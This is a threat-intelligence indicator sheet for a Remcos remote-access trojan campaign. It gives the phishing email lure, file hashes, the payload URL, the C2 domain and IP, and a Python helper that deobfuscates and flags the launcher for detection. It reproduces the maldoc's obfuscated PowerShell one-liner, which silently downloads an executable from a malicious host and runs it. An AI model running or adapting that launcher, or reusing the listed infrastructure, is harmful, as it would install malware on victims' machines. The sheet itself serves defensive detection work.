2021-10-12 Remcos IOCs
THREAT IDENTIFICATION: REMCOS
SUBJECTS OBSERVED
Confirming that you have the following invoices
SENDERS OBSERVED
EMAIL BODY
Hello,
Attached find past due invoice details for your records,
Kind regards,
Nidia Ferguson
MARBRAN USA
P: 956-630-2946
F: 956-984-0489
MALDOC FILE HASHES
past due invoice.xls
2850009ae628ee537c6a956be4393bdd
southernrock.cmd
856b81f09be9693ef4ee8e2131b0ec58
POWERSHELL FROM MALDOC
C:\Users\analyst\Documents\samples>powershell -w hi sleep -Se 31;Start-BitsTransfer -Source htt`p://greenpayindia.com/grren/ConsoleApp17.e`xe -Destination C:\Users\Public\Documents\callscore.e`xe;C:\Users\Public\Documents\callscore.e`xe
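Added triage helper (my own code, not part of this IOC sheet): it undoes the backtick obfuscation in the launcher above and flags the behaviours a detection rule should key on: hidden window via abbreviated `-w hi`, a BITS download from an http URL, a write to C:\Users\Public, and a sleep before the download. Function and field names are my own; the sample command line is the one recorded above, embedded so the script runs offline.

```python
import re

# Command line observed in the maldoc (copied from the sheet above, minus the prompt).
SAMPLE_CMDLINE = (
    "powershell -w hi sleep -Se 31;Start-BitsTransfer -Source "
    "htt`p://greenpayindia.com/grren/ConsoleApp17.e`xe "
    "-Destination C:\\Users\\Public\\Documents\\callscore.e`xe;"
    "C:\\Users\\Public\\Documents\\callscore.e`xe"
)

# Characters that form real PowerShell escape sequences after a backtick.
# A backtick before anything else is a no-op for the parser, which is what
# breaks naive string matches on "http" or ".exe".
_PS_ESCAPES = "0abefnrtuv"


def normalize_powershell(cmd: str) -> str:
    """Drop meaningless backticks (htt`p -> http, e`xe -> exe); keep real escapes.
    Quoting context is ignored, which is adequate for launcher one-liners."""
    return re.sub(r"`(?![%s])" % _PS_ESCAPES, "", cmd, flags=re.I)


def _has_prefix_switch(tokens, full_name, full_value):
    """powershell.exe accepts unambiguous prefixes: '-w hi' == '-WindowStyle Hidden'."""
    for i, tok in enumerate(tokens[:-1]):
        name = tok.lstrip("-").lower()
        if tok.startswith("-") and name and full_name.startswith(name):
            if full_value.startswith(tokens[i + 1].lower()):
                return True
    return False


def analyze_cmdline(cmd: str) -> dict:
    """Return structured findings for a PowerShell launcher command line."""
    clean = normalize_powershell(cmd)
    tokens = re.split(r"[\s;]+", clean)
    urls = re.findall(r"https?://[^\s;'\"]+", clean, flags=re.I)
    paths = re.findall(r"[A-Za-z]:\\[^\s;'\"]+", clean)
    return {
        "normalized": clean,
        "backticks_removed": len(cmd) - len(clean),
        "hidden_window": _has_prefix_switch(tokens, "windowstyle", "hidden"),
        "bits_download": "start-bitstransfer" in clean.lower() and bool(urls),
        "download_urls": urls,
        "public_dir_write": any("\\users\\public\\" in p.lower() for p in paths),
        "sleep_before_download": bool(re.search(r"\b(sleep|start-sleep)\b", clean, re.I)),
    }


if __name__ == "__main__":
    for key, value in analyze_cmdline(SAMPLE_CMDLINE).items():
        print(f"{key}: {value}")
```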
PAYLOAD DOWNLOAD URL
http://greenpayindia.com/grren/ConsoleApp17.exe
REMCOS PAYLOAD FILE HASH
callscore.exe
0497faff25c24f11d0813f8da6b5c2d7
It was renamed and copied as:
taskmgr.exe
0497faff25c24f11d0813f8da6b5c2d7
REMCOS C2
lplazadtemins.duckdns.org
194.147.140.45:443
SUPPORTING EVIDENCE
https://urlhaus.abuse.ch/browse.php?search=greenpayindia.com